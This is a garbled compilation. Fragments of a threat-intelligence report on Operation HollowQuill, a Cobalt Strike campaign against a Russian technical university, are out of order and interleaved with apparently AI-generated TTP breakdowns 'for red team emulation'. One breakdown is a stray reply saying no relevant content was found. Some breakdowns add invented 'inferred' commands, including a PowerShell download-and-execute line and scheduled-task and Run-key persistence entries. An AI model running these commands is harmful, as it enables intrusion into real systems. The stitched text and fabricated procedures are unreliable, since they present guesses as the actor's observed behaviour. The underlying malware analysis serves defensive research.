advanced engineering programs that contribute to Russia’s military-industrialcomplex. Tracked as Operation HollowQuill, the campaign leverages weaponized decoydocuments masquerading as official research invitations to infiltrate academic,governmental, and defense-related networks. The threat entity delivers a malicious RARfile which contains a .NET malware dropper, which further drops other Golang based shellcodeloader along with legitimate OneDrive application and a decoy-based PDF with a final CobaltStrike payload.Key TargetsIndustries AffectedAcademic & Research InstitutionsMilitary & Defense Industry.Aerospace & Missile TechnologyGovernment oriented research entities.Geographical FocusRussian Federation.Infection Chain. Initial Findings.In the early months of 2025, our team found a malicious RAR archive file named as Исх 3548 оформировании государственных заданий на проведение фундаментальных и поисковыхисследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова.rar , which translates to Outgoing 3548

Phase: Initial Access

• Technique: Spear Phishing with Malicious Document
• Procedure: The attacker sends a malicious RAR archive containing a decoy document and .NET malware dropper disguised as an official research invitation.

Phase: Execution

• Technique: .NET Malware Execution
• Procedure: The .NET dropper is executed, initiating further payload deployment.

Phase: Payload Deployment

• Technique: Shellcode Loader Deployment
• Procedure: The .NET dropper installs a Golang-based shellcode loader.

Phase: Execution

• Technique: Legitimate Application Abuse
• Procedure: The loader deploys a legitimate OneDrive application along with the payload.

Phase: Defense Evasion

• Technique: Decoy Document Presentation
• Procedure: A decoy PDF document is presented to the user to disguise malicious activities.

Phase: Command and Control

• Technique: Cobalt Strike Usage
• Procedure: The final payload includes Cobalt Strike, allowing for remote command execution and control over the compromised systems.

Operation HollowQuill: Malware delivered intoRussian R&D Networks via Research Decoy PDFsSubhajeet SinghaOperation HollowQuill: Malware delivered into Russian R&DNetworks via Research Decoy PDFs.ContentsIntroductionKey TargetsIndustries AffectedGeographical FocusInfection ChainInitial FindingsLooking into the decoy-documentTechnical AnalysisStage 1 – Malicious RAR FileStage 2 – Malicious .NET malware-dropperStage 3 – Malicious Golang Shellcode loaderStage 4 – Shellcode OverviewHunting and InfrastructureConclusionSeqrite ProtectionIOCsMITRE ATT&CKAuthorsIntroductionSEQRITE Labs APT-Team has been tracking and has uncovered a campaign targeting the BalticState Technical University, a well-known institution for various defense, aerospace, and

Phase: Initial Access

• Technique: Spear Phishing with Malicious Attachment
• Procedure: The attacker sends emails containing decoy PDF documents designed to lure targets into opening them. These PDFs are bundled within a malicious RAR file.

Phase: Execution

• Technique: User Execution of Compressed File
• Procedure: Users are tricked into extracting and executing contents from the RAR archive.

Phase: Execution

• Technique: .NET Malware Execution
• Program: Malicious .NET malware-dropper is executed, which starts the infection chain by deploying additional payloads.

Phase: Defense Evasion

• Technique: Obfuscated Files or Information
• Program: Golang Shellcode loader is used to obscure and execute embedded shellcode undetected.

Phase: Execution

• Technique: In-Memory Execution of Shellcode
• Procedure: The Golang shellcode loader executes the shellcode directly in memory to avoid detection by endpoint security.

Phase: Command and Control

• Technique: Encrypted Channel
• Procedure: The shellcode establishes an encrypted communication channel with the attacker’s infrastructure, enabling ongoing command and control.

on the formation of state assignments for conducting fundamental and exploratory research atBSTU ‘VOENMEKH’ named after D.F. Ustinov.rar surfaced on Virus Total. Upon investigation,we determined that this RAR has been used as a preliminary source of infection, containing amalicious .NET dropper which contains multiple other payloads along with a PDF based decoy.The RAR archive contains a malicious .NET executable functioning as a dropper, named “Исх3548 о формировании государственных заданий на проведение фундаментальных ипоисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова” which also translates toOutgoing No. 3548 regarding the formation of state assignments for conducting fundamental andexploratory research at BSTU ‘VOENMEKH’ named after D.F. Ustinov. This dropper is responsiblefor deploying a legitimate OneDrive executable alongside a malicious shellcode loader written inGolang. Upon execution, the .NET executable performs several operations: one of them it deploysthe Golang loader containing shellcode, injects the shellcode into the legitimate OneDrive process,and spawns a decoy document. Before delving into the technical details, let’s first examine thedecoy document.Looking into the decoy-document.Upon looking into the decoy document, it turns out that this lure is a document related to theMinistry of Science and Higher Education of Russia, specifically concerning Baltic StateTechnical University “VOENMEKH” named after D.F. Ustinov. The document appears tobe an official communication addressed to multiple organizations, potentially discussing state-assigned research projects or defense-related academic collaborations. The above is a translated version of the initial sections of the decoy.

Phase: Initial Access

• Technique: Spear Phishing with Malicious Archive
• Procedure: The attacker distributes a RAR archive named “Исх 3548” containing a malicious .NET dropper and a decoy document. The decoy appears to be an official communication from the Ministry of Science and Higher Education of Russia.

Phase: Execution

• Technique: .NET Dropper Execution
• Procedure: Upon execution, the .NET executable deploys further payloads and displays a decoy document.

Phase: Defense Evasion

• Technique: Process Injection
• Procedure: The .NET dropper injects malicious shellcode into a legitimate OneDrive executable using a Golang-based shellcode loader.

Phase: Execution (Secondary)

• Technique: Shellcode Execution
• Procedure: The Golang loader runs the injected shellcode within the context of the OneDrive process.

Now, looking into the later part of the decoy it can be seen that the decoy document providesadditional information on the submission process for state-assigned research tasks, emphasizingthat financial support for these projects will come from budgetary allocations through the Ministryof Science and Higher Education of Russia. Also, the document mentions contact details forinquiries of Bogdan Evgenyevich Melnikov, a senior researcher in the Department of Fundamentaland Exploratory Research, with an email address for communication.Well, at the end of this decoy, it can be seen that it has been signed by A.E. Shashurin, who isidentified as a Doctor of Technical Sciences (д.т.н.), professor, and acting rector (и.о. ректора)of the institution. Overall, this lure document serves as an official communication from theMinistry of Science and Higher Education of Russia, providing guidelines for organizationsregarding state-funded research initiatives.Technical AnalysisWe will divide our analysis into four main sections. First, we will examine the malicious RARarchive. Second, we will delve into the malicious .NET dropper. Third, we will focus on analyzingthe working of the malicious Golang based shellcode injector and at the end, we will look into themalicious Cobalt Strike payload. This detailed exploration will shed light on the methodologiesemployed and provide insights into the threat actor’s tactics within this particular campaign.Stage 1 – Malicious RAR File.Upon examining the malicious RAR file, it contains another malicious executable named Исх 3548о формировании государственных заданий на проведение фундаментальных и поисковыхисследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова. After initial analysis of the file’s artefactsit was revealed it is a 32-bit .NET-based executable. In the next section, we will explore thefunctionality of this.NET executable.

Phase: Initial Access

• Technique: Malicious Archive via Phishing
• Procedure: Delivery of a malicious RAR file containing a .NET-based executable named with Russian text.

Phase: Execution

• Technique: User Execution
• Procedure: The user is enticed to open a malicious .NET executable from the RAR archive titled in Russian, representing official communication.

Phase: Delivery

• Technique: .NET Dropper Deployment
• Procedure: The .NET dropper is executed, deploying further payloads or malicious actions.

Phase: Execution

• Technique: Shellcode Injection (Golang-based Injector)
• Procedure: A Golang-based tool is used to inject shellcode into a target process, facilitating further exploitation or execution.

Phase: Command and Control

• Technique: Cobalt Strike Usage
• Procedure: The dropper further deploys a Cobalt Strike payload for command and control operations, enabling remote access and control by the threat actor.

This structured breakdown highlights the stages of the campaign and the tools and techniques used, aiding in red team emulation.

The contents and the entire decoy confirm that this PDF serves as a comprehensive guideline forthe allocation of state-assigned research tasks, outlining the process for organizations to submitproposals for fundamental and applied research projects under the 2026-2028 budget cycle. Itprovides instructions for institutions, particularly those engaged in advanced scientific andtechnological research, on how to register their technological requests within the Unified StateInformation System for Scientific Research and Technological Projects (ЕГИСУ НИОКТР) beforethe specified deadline.

The text provided doesn't contain information relevant to threat actor procedures, commands, or tools. If you have a specific Cyber Threat Intelligence (CTI) report or similar data, please share it to extract and structure the procedures used by the threat actor.

Stage 2 – Malicious .NET malware-dropper.Now, let us look into the workings of the .NET file which was compressed inside the RAR archive.As in the previous section we found that the binary is basically a 32-bit.NET executable, it is alsorenamed as SystemUpdaters.exe while we loaded it into analysis tools. Upon looking inside, the sample, we found three interesting methods. Now let us dive deep into them. Looking into the first method we can see that the Main function, we can see that it calls anothermethod MyCustomApplicationContext . Let us analyze the method. Next, looking into the method, we found that the code initially checks whether the decoy PDF ispresent inside the C:\Users\Appdata\Roaming\Documents location, in case the PDF file is notpresent, it goes ahead and copies the decoy, which is stored under the resources section, and writesit into the location.

Phase: Execution

• Technique: Execution via .NET Malware Dropper
• Executed Program: SystemUpdaters.exe
• Procedure: The .NET executable, renamed as SystemUpdaters.exe, serves as a malware dropper. The Main function calls MyCustomApplicationContext.

Phase: Defense Evasion

• Technique: Hiding Malicious Activity
• Procedure: The malware checks for the presence of a decoy PDF in C:\Users\Appdata\Roaming\Documents. If absent, it copies the decoy from the resources section to this location, likely to avoid detection and maintain a legitimate appearance.

Then looking into one of the most intriguing aspects of this dropper is its use of a shortcut (.lnk)file named X2yL.lnk as a persistence mechanism by placing it in the Windows Startup folder toensure execution upon system boot. Upon analyzing the H3kT7fXw method, we observed that it isresponsible for creating this shortcut file. The method utilizes WshShell to generate the .lnk fileand assigns it a Microsoft Office-based icon, making it less suspicious. Additionally, the targetpath of the shortcut is set to the location where the malicious payload I.e., OneDrives_v2_1.exe isstored, ensuring its execution whenever the shortcut is triggered upon booting. At the end, it goes ahead and spawns the decoy PDF into the screen. As, we conclude the analysisof the malicious .NET dropper, in the next sections, we will analyze the malicious executabledropped by this dropper.Stage 3 – Malicious Golang Shellcode loader.

Phase: Persistence

• Technique: Shortcut (.lnk) File in Startup Folder
• Procedure: The threat actor creates a shortcut file named X2yL.lnk using WshShell. The .lnk file is placed in the Windows Startup folder and linked to the malicious payload OneDrives_v2_1.exe. The icon is set to a Microsoft Office-based icon to reduce suspicion.

Phase: Execution

• Technique: Execution via Startup Folder
• Procedure: Upon system boot, the shortcut .lnk file is triggered, executing the payload OneDrives_v2_1.exe.

Phase: Deception

• Technique: Decoy Document Display
• Procedure: After executing the payload, a decoy PDF is displayed on the screen to distract the user.

Phase: Execution (Golang Shellcode Loader)

• Technique: Shellcode Execution
• Procedure: The .NET dropper eventually leads to the execution of a Golang-based shellcode loader. Details on the specific command lines or execution parameters are not provided, but its role is to load and execute malicious shellcode.

Next, looking into the code further, we found that it checks if the file OneDrive.exe which isbasically the legitimate OneDrive application exists, in case it does not find it on the desiredlocation, it goes ahead and copies the legitimate application stored under the resource section, andwrites it into the location. Looking into the later part of code, we found that it checks for a file named as OneDrives_v2_1.exeunder the location C:\Users\Appdata\Roaming\Driver , in case it did not find the file, just likesimilar files, it copies the executable from the resources section and writes it to the location.

Phase: Execution

• Technique: Sideloading Legitimate Application
• Procedure: The code checks if OneDrive.exe exists in its expected location. If not, it copies the legitimate application from a resource section to that location.

Phase: Persistence

• Technique: File Creation
• Procedure: Checks for the presence of OneDrives_v2_1.exe in C:\Users\Appdata\Roaming\Driver. If the file is missing, it copies the executable from the resources section to the designated location.

Initially, upon looking into the sample inside analysis tools. we can confirm that this executable isprogrammed using Golang. Next, we will look into the working of the shellcode loader and itsinjection mechanism. Looking into the very first part of this shellcode loader, we found that the binary executestime_now function to initially capture the current system time, then it calls time_sleep which isalso a Golang function with a hardcoded value, then again it calls the time_now function, whichchecks for the timestamp after the sleep. Then, it calls time_Time_Sub which checks the differencebetween the timestamp captured by the function and goes ahead and checks if the total sleep timeis less then 6 seconds, in case the sleep duration is shorter, the program exits, this acts as a littleanti-analysis technique.

Phase: Analysis Evasion

• Technique: Anti-Debugging with Timing Check
• Procedure: The attacker’s shellcode loader uses Golang functions to measure sleep time as an anti-analysis technique:
• Executes time_now to capture the current system time.
• Calls time_sleep with a hardcoded duration.
• Calls time_now again to check the timestamp post-sleep.
• Uses time_Time_Sub to calculate time difference.
• If the sleep duration is less than 6 seconds, the program exits.

This sequence ensures that if the environment is being debugged and the sleep is artificially shortened, the program will terminate.

Then finally, the code performs APC Injection technique to inject the shellcode inside the memory,by first starting with the process in a suspended state, followed by decoding and decrypting theshellcode, followed by allocating memory on the suspended OneDrive.exe process, then once thememory is allocated, it goes ahead and writes the shellcode inside the memory usingWriteProcessMemory , then it uses QueueUserAPC API to queue a function call inside the mainthread of the suspended OneDrive.exe process. Finally using ResumeThread which causes thequeued APC function (containing the shellcode) to execute, effectively running the injectedmalicious code within the context of OneDrive.exe. Now, let us analyze some key artifacts of theshellcode.Stage 4 -Shellcode overview.Upon looking inside, the malicious shellcode and analyzing it we found that the shellcode isactually a loader, which works by initially loading a Windows wwanmm.dll library. Once, the DLL is loaded it zeroes out the .text section of the DLL. It uses a windows APIDllCanUnloadNow which helps to prepare the beacon in memory. Thus, further facilitating theworking of the shellcode which is a Cobalt Strike beacon.

Phase: Execution

• Technique: Process Injection (APC Injection)
• Procedure:
  1. Start Process in Suspended State: Launch OneDrive.exe in a suspended state.
  2. Decode and Decrypt Shellcode: Prepare the shellcode for injection by decoding and decrypting it.
  3. Allocate Memory: Allocate memory in the OneDrive.exe process.
  4. Write Shellcode into Memory: Use WriteProcessMemory to write the shellcode into the allocated memory.
  5. Queue APC: Use QueueUserAPC API to queue a function call in the main thread of the suspended OneDrive.exe process.
  6. Resume Thread: Use ResumeThread to execute the queued APC function, running the injected shellcode within the OneDrive.exe context.

Phase: Execution

• Technique: DLL Manipulation
• Procedure:
  1. Load DLL: Load wwanmm.dll.
  2. Zero Out .text Section: Zero out the .text section of the DLL.
  3. Prepare Beacon: Use DllCanUnloadNow API to prepare the Cobalt Strike beacon in memory.

Next, moving ahead and checking the code, we found that the legitimate OneDrive executable,which was dropped by the.NET dropper, that similar process is being created using theCreateProcess API in Golang, and the process is being created in a suspended mode. Then, the shellcode which is already embedded in this loader binary is being read by using Golangfunction embed_FS_ReadFile which returns the shellcode. Next, the shellcode which was returned by the previous function in a base64 encoded format isbeing decoded using Golang native function base64.StdEncoding.DecodeString and returned. Then, the code basically uses a hardcoded 13-byte sized key, which is basically used to decode theentire shellcode.

Phase: Execution

• Technique: Process Injection via Suspended Process
• Procedure:
  1. CreateProcess API Usage:
  2. The legitimate OneDrive executable is launched in a suspended mode using the CreateProcess API.
  3. Shellcode Retrieval:
  4. Utilizes Golang's embed_FS_ReadFile function to read embedded shellcode.
  5. Shellcode Decoding:
  6. Decodes the base64 encoded shellcode using Golang's base64.StdEncoding.DecodeString.
  7. Shellcode Decryption:
  8. Decodes the shellcode using a hardcoded 13-byte key to execute within the suspended process.

Phase: Defense Evasion

• Technique: Use of Legitimate Binary for Execution
• Procedure: Execution of payload through a legitimate binary (OneDrive executable) to bypass security detections.

Further analyzing it becomes quite evident that the beacon is connecting to the C2-server, hostedby the attacker using certain user-agent. As, this tool is quite commonly used, therefore, we willnot delve in-depth on the workings of the malicious beacon. The configuration of the beacon can beextracted as follows.Extracted Configuration:Method : GETHost[Command & Control] : phpsympfony.comUser-Agent : “Mozilla/5.0 (WindowsNT 6.3; Trident/7.0; rv:11.0) like Gecko”Hunting and Infrastructure.Upon analysis of the shellcode injector programmed in Golang, we found little OPSEC relatedmistakes from the threat actor such as leaving Go-build ID along with the injector, which helped usto hunt for similar payloads, used by the same threat actor. The Go-build ID is as follows:-_APqjT14Rci2qCv58VO/QN6emhFauHgKzaZvDVYE/3lVOVKh9ePO_EDoV_lSN/NL58izAdTGRId20sd3CJNow, looking into the infrastructural artefacts, the malicious command-and-control server whichhas been hosted at the domain phpsymfony[.]com , has been rotating the domain across multiplesASN services. Also, there has been a unique HTTP-Title which has also been rotated multiple timesacross the C2-server.

Phase: Command and Control

• Technique: Beaconing via HTTP GET Request
• Procedure: The attacker uses a malicious beacon that connects to the C2 server using a specific user-agent string.
• User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
• Configuration Extract: Involves an HTTP GET method connection to phpsympfony.com.

Phase: Execution

• Technique: Shellcode Injection
• Procedure: A custom shellcode injector written in Golang is used to facilitate payload execution.

Additional Observations

• Utilizing Go-build ID helped in identifying and hunting similar injector payloads used by the threat actor.

AS174 United States COGENT-174AS47846 Germany SEDO-ASAS8560 UnknownIONOS-ASConclusionWe have found that a threat actor is targeting the Baltic Technical University using researchthemed lure where they have been using a.NET dropper to shellcode loader finally delivering aCobalt Strike in-memory implant. Analyzing the overall campaign and TTPs employed by thethreat actor, we can conclude that the threat actor has started targeting few months back sinceDecember 2024.SEQRITE Protection.Trojan.Ghanarava.1738100518c73fdbTrojan.Ghanarava.1735165667615275 IOCs.MD5 Filenameab310ddf9267ed5d613bcc0e52c71a08 Исх 3548 о формировании государственныхзаданий на проведение фундаментальных ипоисковых исследований БГТУ «ВОЕНМЕХ» им.Д.Ф. Устинова.rarfad1ddfb40a8786c1dd2b50dc9615275 SystemsUpdaters.exe

Phase: Initial Access

• Technique: Spear-Phishing with File Attachment
• Procedure: The attacker sends a phishing email with a research-themed lure, including a malicious .NET dropper disguised as a legitimate document.

Phase: Execution

• Technique: .NET Dropper Execution
• Procedure: The malicious .NET dropper is executed, leading to the delivery of a shellcode loader.

Phase: Execution

• Technique: Shellcode Loader
• Procedure: The shellcode loader is executed to deliver the Cobalt Strike in-memory implant.

Phase: Command and Control

• Technique: Cobalt Strike Usage
• Procedure: Once the Cobalt Strike implant is in memory, it establishes a command and control channel for further instructions and actions.

Potential Additional Commands and Tools

These are inferred based on standard TTPs associated with Cobalt Strike: - Technique: PowerShell Execution - Command: powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('<URL>')

• Technique: Persistence via Scheduled Task

• Command: schtasks /create /tn "UpdateTask" /tr "C:\Path\to\malicious.exe" /sc minute /mo 15

• Technique: Privilege Escalation

• Procedure: Using built-in Windows tools or Cobalt Strike modules to escalate privileges on the compromised system.

The sequence reflects a typical progression from initial access to establishing a persistent foothold in the targeted environment, leveraging Cobalt Strike’s versatile capabilities.

Looking into the response across the history we can see that the title Coming Soon –pariaturzzphy.makebelievercorp[.]com has been set up multiple times. Upon further searching for the same HTTP-Title, we found that a lot of hosts are serving the sametitle, out of which some of them are serving malicious binaries such as ASyncRAT and much more. Looking into the ASNs, the C2 server has been rotating since the date of activation. The list is asfollows.ASN Geolocation OwnerAS13335 United States Cloudflare NetAS35916 United States MULTA-ASN1AS135377 Hong Kong UCLOUD-HK-AS-AP UCLOUD INFORMATION TECHNOLOGYHK LIMITED

Based on the provided CTI information, there are no explicit command-line details or specific TTPs directly outlined. However, inferred techniques related to the malware and activity mentioned can be described as follows:

Phase: Command and Control

• Technique: Use of Remote Access Tools
• Procedure: Deployment of ASyncRAT for command and control, allowing threat actors to maintain access to compromised systems. This typically involves installing ASyncRAT on target systems to enable remote administration and ongoing communication with rotating C2 servers.

Inferred Activities Based on Known Malware and Methodologies:

Phase: Initial Access

• Technique: Spear Phishing or Drive-by Download
• Procedure: Malicious documents or links could initiate the download of ASyncRAT payloads once accessed by the victim.

Phase: Execution

• Technique: Malware Execution
• Procedure: Likely involves executing ASyncRAT using methods such as script invocation or exploiting autostart entries to establish persistence.

Phase: Persistence

• Technique: Registry Run Keys or Scheduled Tasks
• Command (Inferred): reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "ASyncRAT" /t REG_SZ /d "C:\path\to\async.exe"
  or
• Command (Inferred): schtasks /create /tn "ASyncUpdater" /tr "C:\path\to\async.exe" /sc onlogon

Phase: Lateral Movement

• Technique: Remote Desktop Protocol (RDP) or PsExec for lateral movement (If tools similar to ASyncRAT are used for internal spreading).
• Procedure (Inferred): Utilize compromised credentials to move laterally across the network.

Phase: Defense Evasion

• Technique: Obfuscation or Process Hollowing
• Procedure (Inferred): Use of obfuscation techniques within ASyncRAT to avoid detection by security solutions.

Note: For precise emulation, verify each inferred procedure with current ASyncRAT capabilities and updates since threat tools frequently evolve.

Model: gemini-2.0-flash

Okay, here's the breakdown of the TTPs from the provided CTI report, formatted for red team use.

Operation HollowQuill TTPs

Phase: Initial Access

• Technique: Phishing via Malicious Document
• Procedure: The attacker delivers a malicious RAR file via spear-phishing, disguised as a research invitation. The RAR file contains a .NET malware dropper and a decoy PDF.

Phase: Execution

• Technique: Execution via RAR archive
• Procedure: After unpacking the RAR Archive.

Phase: Installation

• Technique: .NET Malware Dropper

• Procedure: Executes SystemUpdaters.exe. This dropper performs the following actions:

  • Drops a decoy PDF to C:\Users\<User>\AppData\Roaming\Documents\Исх_по_списку_БГТУ_ВОЕНМЕХ.pdf

  • Drops a legitimate version of OneDrive.exe to C:\Users\Public\OneDrive.exe.

  • Drops a Golang shellcode loader, renaming it C:\Users\AppData\Roaming\Driver\OneDrives_v2_1.exe.

Phase: Persistence

• Technique: Shortcut Creation (Startup Folder)
• Procedure: The .NET dropper creates a shortcut (X2yL.lnk) in the Windows Startup folder (Environment.SpecialFolder.Startup), using a Microsoft Office icon to masquerade the malicious shortcut. The shortcut's target is set to C:\Users\<User>\AppData\Roaming\Driver\OneDrives_v2_1.exe.

Phase: Defense Evasion and Code Injection

• Technique: Process Injection (APC Injection)
• Procedure:
  1. The Golang shellcode loader (OneDrives_v2_1.exe) uses the CreateProcess API in Golang to launch the legitimate OneDrive.exe process in a suspended state.
  2. The shellcode loader decodes a base64 encoded shellcode embedded within it by XOR-ing the base64 result with a key.
  3. The loader allocates memory in the suspended OneDrive.exe process using VirtualAllocEx.
  4. It writes the decrypted shellcode into the allocated memory using WriteProcessMemory.
  5. It injects the shellcode into the process using APC injection by calling QueueUserAPC.
  6. The ResumeThread API is then called to resume execution, triggering the shellcode within the OneDrive.exe process.

Phase: Payload Delivery

• Technique: In-Memory Execution
• Procedure: The injected shellcode (Cobalt Strike beacon) executes within the context of the OneDrive.exe process. The shellcode first loads and then zeroes out the .text section of wwanmm.dll by calling DllCanUnloadNow.

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the threat actor's procedures for red team emulation, based on the provided report:

Phase: Initial Access

• Technique: Phishing: Spear phishing Attachment (T1566.001)
• Procedure: The threat actor delivers a malicious RAR archive file, disguised as an official research invitation or state assignment document, to targeted Russian R&D networks.

Phase: Execution

• Technique: User Execution: Malicious File (T1204.002)
• Program: .NET Dropper (e.g., SystemsUpdaters.exe, extracted from the initial RAR)
• Procedure: Upon user execution of the malicious RAR file, a .NET dropper executable is extracted and run.
• Program: .NET Dropper
• Procedure: The .NET dropper extracts and drops multiple files from its resources to specific locations:
  • A legitimate OneDrive.exe to C:\Users\Public\OneDrive.exe.
  • A malicious Golang shellcode loader (e.g., OneDrives_v2_1.exe) to C:\Users\Appdata\Roaming\Driver.
  • A decoy PDF document (e.g., Исх_по_списку_БГТУ_ВОЕНМЕХ.pdf) to C:\Users\Appdata\Roaming\Documents.
• Program: .NET Dropper
• Procedure: The .NET dropper spawns and displays the extracted decoy PDF document to the user as a lure.
• Technique: Asynchronous Procedure Call (T1055.004)
• Program: Golang Shellcode Loader (e.g., OneDrives_v2_1.exe)
• Procedure: The Golang loader creates a suspended process of the legitimate OneDrive.exe.
• Program: Golang Shellcode Loader
• Procedure: The Golang loader decodes and decrypts an embedded Cobalt Strike shellcode using a hardcoded XOR key.
• Program: Golang Shellcode Loader
• Procedure: The Golang loader injects the decoded Cobalt Strike shellcode into the suspended OneDrive.exe process's memory using API calls such as VirtualAllocEx, WriteProcessMemory, and QueueUserAPC.
• Program: Golang Shellcode Loader
• Procedure: The Golang loader resumes the suspended OneDrive.exe process to execute the injected shellcode within its context.
• Program: Cobalt Strike Beacon (injected into OneDrive.exe)
• Procedure: The injected Cobalt Strike beacon loads the wwanmm.dll library.
• Program: Cobalt Strike Beacon
• Procedure: The Cobalt Strike beacon zeroes out the .text section of wwanmm.dll for memory preparation.
• Program: Cobalt Strike Beacon
• Procedure: The Cobalt Strike beacon uses DllCanUnloadNow to finalize its preparation in memory.

Phase: Persistence

• Technique: Registry Run Keys / Startup Folder (T1547.001)
• Program: .NET Dropper
• Procedure: The .NET dropper creates a shortcut file (e.g., X2yL.lnk) in the user's Windows Startup folder.
  • The shortcut's target path is the malicious Golang loader (e.g., C:\Users\Appdata\Roaming\Driver\OneDrives_v2_1.exe).
  • The shortcut is assigned a Microsoft Office-based icon to appear legitimate.

Phase: Defense Evasion

• Technique: Masquerading (T1036)
• Procedure: Malicious files are named to resemble legitimate system or application files (e.g., SystemsUpdaters.exe, OneDrives_v2_1.exe, OneDrive.exe, and the decoy PDF).
• Procedure: The shortcut file created for persistence uses a legitimate Microsoft Office icon to appear benign.
• Technique: Embedded Payloads (T1027.009)
• Procedure: The initial RAR archive contains a .NET dropper, which in turn embeds and drops a Golang loader, a legitimate OneDrive executable, and a decoy PDF, all within its resources.
• Technique: Time Based Evasion (T1497.003)
• Program: Golang Shellcode Loader
• Procedure: The Golang loader performs an anti-analysis check by measuring the sleep duration; it exits if the sleep time is less than 6 seconds.

Phase: Command and Control

• Technique: Data Encoding: Standard Encoding (T1132.001)
• Program: Cobalt Strike Beacon
• Procedure: The Cobalt Strike beacon communicates with its C2 server using standard HTTP/HTTPS protocols.
• Program: Cobalt Strike Beacon
• Procedure: The Cobalt Strike beacon uses a user-agent string consistent with a legitimate browser (e.g., Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) for C2 communications.